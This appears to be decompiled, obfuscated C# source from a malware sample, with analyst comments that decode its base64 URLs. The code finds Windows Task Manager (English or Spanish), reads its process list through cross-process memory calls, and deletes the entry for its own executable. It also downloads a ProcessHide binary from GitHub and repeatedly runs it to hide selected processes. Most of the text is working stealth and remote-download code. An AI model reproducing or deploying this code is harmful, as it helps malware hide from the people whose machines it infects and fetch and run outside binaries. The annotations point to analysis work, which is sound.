// Token: 0x06000084 RID: 132
private static string InitAllocate(IntPtr intptr_0, IntPtr intptr_1)
{
byte[] array = new byte[50];
ClassDown.dKbHtpDNcyBx dKbHtpDNcyBx = default(ClassDown.dKbHtpDNcyBx);
uint uint_;
ClassDown.GetWindowThreadProcessId(intptr_0, out uint_);
IntPtr intPtr = ClassDown.ChoseOpenProcess(uint_);
IntPtr intPtr2 = ClassDown.Allocate((uint)Marshal.SizeOf <ClassDown.dKbHtpDNcyBx>(dKbHtpDNcyBx), intPtr);
IntPtr intPtr3 = ClassDown.Allocate(50u, intPtr);
dKbHtpDNcyBx.TJgUaBOUBT = intptr_1;
dKbHtpDNcyBx.VSUSauiToCtS = (IntPtr)0;
dKbHtpDNcyBx.SHlkcsOkGpZs = 50u;
dKbHtpDNcyBx.wXxIWQZbNvLd = intPtr3;
UIntPtr uintPtr;
ClassDown.WriteProcessMemory(intPtr, intPtr2, ClassDown.CopyStructure(dKbHtpDNcyBx), (uint)Marshal.SizeOf <ClassDown.dKbHtpDNcyBx>(dKbHtpDNcyBx), out uintPtr);
ClassDown.SendMessage(intptr_0, 4141u, intptr_1, intPtr2);
ClassDown.ReadProcessMemory(intPtr, intPtr3, array, 50, out uintPtr);
ClassDown.Free(intPtr, intPtr2, (uint)Marshal.SizeOf <ClassDown.dKbHtpDNcyBx>(dKbHtpDNcyBx));
ClassDown.Free(intPtr, intPtr3, 50u);
ClassDown.CloseTheHandle(intPtr);
return(Encoding.ASCII.GetString(array));
}
// Token: 0x06000086 RID: 134
private static void PushmessageData()
{
IntPtr intPtr = ClassDown.CheckTaskManager();
if (intPtr != IntPtr.Zero)
{
ClassDown.PushMessage2(intPtr);
ClassDown.PushMessage2(intPtr);
ClassDown.PushMessage2(intPtr);
ClassDown.PushMessage2(intPtr);
ClassDown.PushMessage2(intPtr);
}
}
// Token: 0x0600006D RID: 109
public static string DownloadHideProcess()
{
if (IntPtr.Size == 8)
{
MainCore.idAGkbKivQU = ClassDown.Down(new Uri(MainCore.DecodeBase64("aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2QzNWhhL1Byb2Nlc3NIaWRlL21hc3Rlci9iaW5zL1Byb2Nlc3NIaWRlNjQuZXhl")));
// -> https://raw.githubusercontent.com/d35ha/ProcessHide/master/bins/ProcessHide64.exe
}
else
{
MainCore.idAGkbKivQU = ClassDown.Down(new Uri(MainCore.DecodeBase64("aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2QzNWhhL1Byb2Nlc3NIaWRlL21hc3Rlci9iaW5zL1Byb2Nlc3NIaWRlMzIuZXhl")));
// -> https://raw.githubusercontent.com/d35ha/ProcessHide/master/bins/ProcessHide32.exe
}
return(MainCore.idAGkbKivQU);
}
// Token: 0x06000088 RID: 136
private static void Verify()
{
while (!ClassDown.wyfMfGMephQYv)
{
if (ClassDown.MBcnWmpVGoY)
{
ClassDown.Check(Process.GetCurrentProcess().ProcessName + ".exe");
Thread.Sleep(525);
}
else
{
ClassDown.PushmessageData();
Thread.Sleep(1000);
}
}
ClassDown.wyfMfGMephQYv = false;
}
// Token: 0x06000085 RID: 133
private static void Check(string string_0)
{
IntPtr intPtr = ClassDown.CheckTaskManager();
if (intPtr != IntPtr.Zero)
{
int num = (int)ClassDown.PushMessage(intPtr);
for (int i = 0; i < num; i++)
{
string text = ClassDown.InitAllocate(intPtr, (IntPtr)i);
if (text.Contains(string_0))
{
ClassDown.PushMessage3(intPtr, (IntPtr)i);
}
}
}
}
// Token: 0x06000080 RID: 128
private static IntPtr CheckTaskManager()
{
IntPtr intPtr = ClassDown.FindWindow("TaskManagerWindow", "Administrador de tareas"); //-> in Spanish : Task Manager
if (intPtr == IntPtr.Zero)
{
intPtr = ClassDown.FindWindow("#32770", "Task Manager");
intPtr = ClassDown.FindWindowEx(intPtr, IntPtr.Zero, "#32770", null);
intPtr = ClassDown.FindWindowEx(intPtr, IntPtr.Zero, "SysListView32", "Processes");
}
else
{
intPtr = ClassDown.FindWindowEx(intPtr, IntPtr.Zero, "#32770", null);
intPtr = ClassDown.FindWindowEx(intPtr, IntPtr.Zero, "SysListView32", "Procesos");
}
return(intPtr);
}
// Token: 0x06000070 RID: 112
public static void Hide(string[] string_0)
{
string text = ClassDown.DownloadHideProcess();
if (string.IsNullOrEmpty(text))
{
return;
}
for (;;)
{
foreach (string string_ in string_0)
{
Process process = ClassDown.CheckProcess(string_);
if (process != null)
{
string str = process.Id.ToString();
MainCore.CreateProcess(text, str + " " + Path.GetFileName(Process.GetCurrentProcess().MainModule.FileName));
MainCore.CreateProcess(text, str + " " + Path.GetFileName(Process.GetCurrentProcess().MainModule.FileName) + " *32");
}
}
Thread.Sleep(200);
}
}
// Token: 0x06000083 RID: 131
private static void PushMessage2(IntPtr intptr_0)
{
ClassDown.SendMessage(intptr_0, 4124u, IntPtr.Zero, IntPtr.Zero);
}
// Token: 0x06000082 RID: 130
private static void PushMessage3(IntPtr intptr_0, IntPtr intptr_1)
{
ClassDown.SendMessage(intptr_0, 4104u, intptr_1, IntPtr.Zero);
}
// Token: 0x06000081 RID: 129
private static IntPtr PushMessage(IntPtr intptr_0)
{
return(ClassDown.SendMessage(intptr_0, 4100u, IntPtr.Zero, IntPtr.Zero));
}
// Token: 0x0600007F RID: 127
private static void Free(IntPtr intptr_0, IntPtr intptr_1, uint uint_0)
{
ClassDown.VirtualFreeEx(intptr_0, intptr_1, uint_0, 32768);
}
// Token: 0x0600007E RID: 126
private static IntPtr Allocate(uint uint_0, IntPtr intptr_0)
{
return(ClassDown.VirtualAllocEx(intptr_0, IntPtr.Zero, uint_0, 12288, 4));
}
// Token: 0x0600007D RID: 125
private static void CloseTheHandle(IntPtr intptr_0)
{
ClassDown.CloseHandle(intptr_0);
}
// Token: 0x0600007C RID: 124
private static IntPtr ChoseOpenProcess(uint uint_0)
{
return(ClassDown.OpenProcess(56, false, uint_0));
}
